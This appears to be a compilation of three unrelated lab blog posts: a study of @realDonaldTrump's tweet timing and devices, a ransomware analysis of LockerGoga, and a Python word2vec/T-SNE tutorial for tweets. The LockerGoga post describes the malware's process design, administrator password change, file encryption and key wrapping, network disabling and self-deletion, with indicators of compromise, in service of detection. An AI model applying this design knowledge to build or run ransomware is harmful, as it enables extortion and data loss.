I’ve just started experimenting with Tweepy to write a series of scripts attempting to identify Twitter bots and sockpuppet rings. It’s been a while since I last played around with this kind of stuff, so I decided to start by writing a couple of small test scripts. In order to properly test it, I needed to point towards an active account. So, I opted for @realDonaldTrump.

After collecting data from the past 12 months, Sean and I realized that it should be broken into four separate sets to provide context. Here’s how we’ve broken it down.

  • All data from ~365 days ago, up until the day of the US presidential election (November 8th, 2016).
  • Data spanning the period between post-election and the inauguration (January 20th, 2017).
  • Data from the period after the inauguration… until a noticeable change in Trump’s Twitter habits which occurred on the weekend of March 4th/5th, 2017. More on this later.
  • All data after March 5th to present.

The following diagram shows activity based on time and day, broken down by the four time periods defined above. As you can see, the highest Twitter activity has always occurred between early and mid-afternoon. Note the almost complete lack of activity between 08:00 and 12:00. Anybody developing Twitter bots for trading purposes might want to flag any activity on this account during that time-slot as “out of band”, and worthy of closer attention.

Times of the day when @realDonaldTrump Tweets have been posted. Darker red signifies more activity.
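A per-hour breakdown like the one above can be computed directly from each Tweet's created_at field (format per the Twitter API); a minimal sketch:

```python
from collections import Counter
from datetime import datetime

def hour_histogram(created_at_strings):
    """Count tweets per hour of day from Twitter's created_at format,
    e.g. 'Wed Mar 01 14:05:00 +0000 2017'."""
    fmt = "%a %b %d %H:%M:%S %z %Y"
    return Counter(datetime.strptime(s, fmt).hour for s in created_at_strings)
```

Feeding the resulting Counter into a plotting library (or just printing it sorted by hour) reproduces the kind of activity-by-hour view shown here.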

Here’s the time of day data graphed. Notice that Trump’s daily Twitter activity pattern didn’t really change across this data set.

Twitter activity by time of day

@realDonaldTrump Twitter activity by time of day. The different colored lines represent different devices used when posting a Tweet.

Notice the last graph? This is the change of behavior I alluded to earlier. Prior to March 7th, 2017, Tweets posted via “Twitter for Android” were always in the overwhelming majority. The only other data set that shows significant iPhone usage is the election campaign period. And those Tweets can be most likely attributed to campaign staff.

So, how much did @realDonaldTrump Tweet before and after becoming POTUS?

Number of posts made to @realDonaldTrump’s account by week. The different colors represent device client used to post the Tweet.

During the run up to the 2016 elections, @realDonaldTrump’s account posted about twice as many Tweets per week as in the following months. The above graph also nicely illustrates the switch from Android to iPhone on week 10 of 2017. Here’s another graph that illustrates it.

Percent client usage across the four data sets.
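A client-share breakdown like this follows from the source field of each Tweet object (field name per the Twitter API; in practice the value contains an HTML anchor that would need stripping first, and the sample data below is made up):

```python
from collections import Counter

def client_share(statuses):
    """Percentage of tweets posted from each client, read from the
    'source' field of the Tweet objects."""
    counts = Counter(s["source"] for s in statuses)
    total = sum(counts.values())
    return {client: 100.0 * n / total for client, n in counts.items()}
```

Computed once per time period, this gives exactly the per-device percentages plotted across the four data sets.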

Well, why did @realDonaldTrump’s account suddenly shift from Android to iPhone? It could have been something that was in the works (for security reasons). Or… it might have something to do with this Tweet.

Whatever the reason, the “schedule” remains more or less the same.

Next steps?

Perhaps we’ll build a bot of our own. It’s a work in progress, and I’ll post on this more in the future.



#####EOF##### Analysis of LockerGoga Ransomware | News from the Lab

Analysis of LockerGoga Ransomware

We recently observed a new ransomware variant (which our products detect as Trojan.TR/LockerGoga.qnfzd) circulating in the wild. In this post, we’ll provide some technical details of the new variant’s functionalities, as well as some Indicators of Compromise (IOCs).

Overview

Compared to other ransomware variants that use Windows’ CRT library functions, this new variant relies heavily on the less commonly used Boost library. For example, instead of the CRT’s rename function, it uses boost::filesystem::rename. The change makes technical analysis more difficult for researchers, as it makes function identification harder.

The functionalities for file enumeration and file encryption are split into different processes. File path sharing happens using the Boost.Interprocess library, which makes it harder to analyze the processes separately.

File encryption

If we execute the sample without any arguments, it moves the executable to the %TEMP% directory under the hard-coded name “tgytutrc{number}.exe” and executes it with the “-m” argument (where “m” stands for “master process”):

As we can see in the screenshot, the main executable uses functions from the Boost library to copy and execute the sample.

exec_from_first

first_create_process_api_monitor

The main functionality resides in the “master” process, which enumerates files on the infected system and executes child processes to encrypt them.

If we provide the additional argument “-l”, the process will create the file “C:\\.log.txt” and write file paths and error messages to it.

To parse command line arguments, the sample uses the Boost.Program_options library (see the screenshot below):

[Screenshot: master_process]

Before starting the encryption phase, the “master” process enumerates sessions and logs off all but the current process’s session.

The process uses the ProcessIdToSessionId function to get the session associated with the current process.

[Screenshot: enum_sessions_second]

This is a list of active sessions on a test machine. Since session “1” is the session of the current process, it logs off only session “0”:

[Screenshot: enumerate_sessions]

After that, the “master” process changes the password for all administrator accounts to “HuHuHUHoHo283283@dJD“.

I created a standard user account, but the malware only changes the passwords of administrator accounts:

[Screenshot: second_changes_admin_passwords]

The “master” process creates shared memory using the Boost.Interprocess library and executes child processes (from the same executable) with the arguments “-i SM-tgytutrc -s”, where “-i” specifies the shared section name and “-s” stands for “slave”.

According to Wikipedia: “shared memory is memory that may be simultaneously accessed by multiple programs with an intent to provide communication among them or avoid redundant copies.”
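The same pattern (one process publishing data in a named shared section, another attaching to it by name) can be sketched with Python’s multiprocessing.shared_memory module, a rough stand-in for the Boost.Interprocess API that the C++ sample actually uses. The section name “sm_demo” is made up for this illustration:

```python
from multiprocessing import shared_memory

# "Master": create a named shared section and publish a message.
master = shared_memory.SharedMemory(create=True, size=64, name="sm_demo")
master.buf[:5] = b"hello"

# "Slave" (normally a separate process): attach to the section by name.
slave = shared_memory.SharedMemory(name="sm_demo")
message = bytes(slave.buf[:5])
print(message)

# Clean up: detach both handles, then destroy the section.
slave.close()
master.close()
master.unlink()
```

This requires Python 3.8 or later; in the malware, the equivalent roles are played by the “master” and “slave” processes spawned from the same executable.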

In the screenshot, we see that, after changing the passwords, it uses the Boost library to initialize the shared memory and execute the child (“slave”) processes:

[Screenshot: change_admi_pswds_create_subProc]

[Screenshot: slave_proc]

Next, the “master” process enumerates files and writes their paths (encoded with Base64) in the shared memory.

The process uses Boost::Filesystem library to query paths, files, and directories:

[Screenshot: boost_lib_files_enum]

File paths are encoded with Base64:

[Screenshot: shared_memory]

Child processes decode the data from the shared memory. Each record in the shared memory has the following structure: the first DWORD holds the file index, and the second holds the size of the Base64-encoded data:

[Screenshot: base64_encoded_from_third_]
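To make that record layout concrete, here is an illustrative parser. This is a reconstruction, not code from the sample; the little-endian DWORD fields and their exact ordering are assumptions based on the screenshot:

```python
import base64
import struct

def parse_record(buf, offset=0):
    """Parse one (index, size, Base64 path) record from a shared-memory dump.

    Assumed layout: DWORD file index, DWORD payload size, then `size`
    bytes of Base64-encoded file path.
    """
    index, size = struct.unpack_from("<II", buf, offset)
    payload = buf[offset + 8:offset + 8 + size]
    path = base64.b64decode(payload).decode("utf-8")
    return index, path, offset + 8 + size

# Build a fake record the way the "master" process would, then parse it.
encoded = base64.b64encode(u"C:\\Users\\test\\document.doc".encode("utf-8"))
record = struct.pack("<II", 1, len(encoded)) + encoded
index, path, _ = parse_record(record)
print(index, path)
```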

After decoding a file path, a child process generates a key/IV pair using the Crypto++ library.

The OS_RNG class uses Windows’ CryptGenRandom function; another Crypto++ function then uses it to generate random numbers:

[Screenshot: third_generate_key_iv]

Before the encryption, a “slave” process renames a file using Boost::Filesystem::rename function:

[Screenshot: third_remove_locked_and_rename_to_locked]

Next, the child process encrypts the file’s content using the Rijndael algorithm. It also appends the generated key/IV pair, in encrypted form, to the end of the file. The key/IV pair is encrypted with a public key embedded in the executable:

[Screenshot: third_append_enc_key_iv]
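The overall scheme (a per-file symmetric key/IV, with the key material wrapped and appended to the encrypted file) can be sketched in a dependency-free way. Note the stand-ins: a toy XOR keystream replaces Rijndael, and a symmetric wrap replaces the RSA public-key encryption the sample actually performs:

```python
import os

def xor_stream(data, key):
    # Toy keystream cipher used purely for illustration; the real sample
    # encrypts with Rijndael (AES) via the Crypto++ library.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encrypt_file_layout(plaintext, wrap_key):
    # Generate a per-file key/IV pair (the sample uses Crypto++'s RNG).
    key_iv = os.urandom(32)
    ciphertext = xor_stream(plaintext, key_iv)
    # The sample wraps the key/IV with an embedded public key (RSA);
    # a symmetric stand-in keeps this sketch dependency-free.
    wrapped_key_iv = xor_stream(key_iv, wrap_key)
    # Final layout: encrypted content followed by the wrapped key/IV.
    return ciphertext + wrapped_key_iv

blob = encrypt_file_layout(b"document contents", b"embedded-key-standin")
print(len(blob))  # ciphertext plus a 32-byte wrapped key/IV block
```

Only someone holding the corresponding private key can unwrap the appended key/IV and decrypt the file, which is what makes this layout typical for ransomware.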

After it encrypts a file, a child process overwrites the first byte of the encoded data in shared memory with a “0” byte.

[Screenshot: overwrite_first_byte_after_reading_filePath]

Network changes

After the encryption phase, the “master” process enumerates all network interfaces and disables them.

List of active adapters on my test machine:

[Screenshot: list_of_adapters]

The “master” process disables them one by one:

[Screenshot: disable_interfaces]

Next, it deletes the executable via a “.bat” file, which contains commands to delete both the executable and the bat file itself.

[Screenshot: second_end_delete_]

At the end, it logs off the current process’s session:

[Screenshot: second_logoff_current_session]

Conclusion

Overall, the latest variant of the LockerGoga ransomware is not especially complex. However, because it uses the Boost and Crypto++ libraries instead of the more common CRT functions, it is somewhat more troublesome for a threat researcher to analyze.

Indicators of compromise (IOCs)

SHA256:

  • C97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15

Hard coded mutexes:

  • MX-tgytutrc

Directory with malicious executables:

  • %APPDATA%\Local\Temp\tgytutrc8.exe

#####EOF##### NLP Analysis Of Tweets Using Word2Vec And T-SNE | News from the Lab

NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”
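“Close proximity” here is typically measured with cosine similarity between vectors. A stdlib-only toy illustration (the three-dimensional vectors below are invented for the example; real word2vec embeddings have hundreds of dimensions):

```python
import math

def cosine_similarity(a, b):
    # cos(theta) = (a . b) / (|a| * |b|)
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Invented toy "embeddings": words used in similar contexts get similar vectors.
king = [0.9, 0.8, 0.1]
queen = [0.85, 0.75, 0.2]
apple = [0.1, 0.2, 0.9]

print(cosine_similarity(king, queen))  # near 1.0: similar contexts
print(cosine_similarity(king, apple))  # much lower: unrelated contexts
```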

During the two weeks leading up to the January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data).

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed the step once, and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the English alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          for s in stopwords:
            if token == s:
              token = None
        if token is not None:
            if re.search("^[0-9\.\-\s\/]+$", token):
              token = None
        if token is not None:
            cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

Now that we’re done with all the preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor). It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set fewer than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally, take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the directory where this script was run:

tensorboard --logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

[Screenshot: Tensorboard “projector” menu item]

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

[Screenshot: Tensorboard’s projector view]

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is to find similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num-similar words. The returned value is a list containing the queried word, and a list of similar words. ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
  return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary, and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language, (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distribution, query each of them for the 40 most similar words, and plot both labelled graphs of each set and a “big plot” of that set over the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.



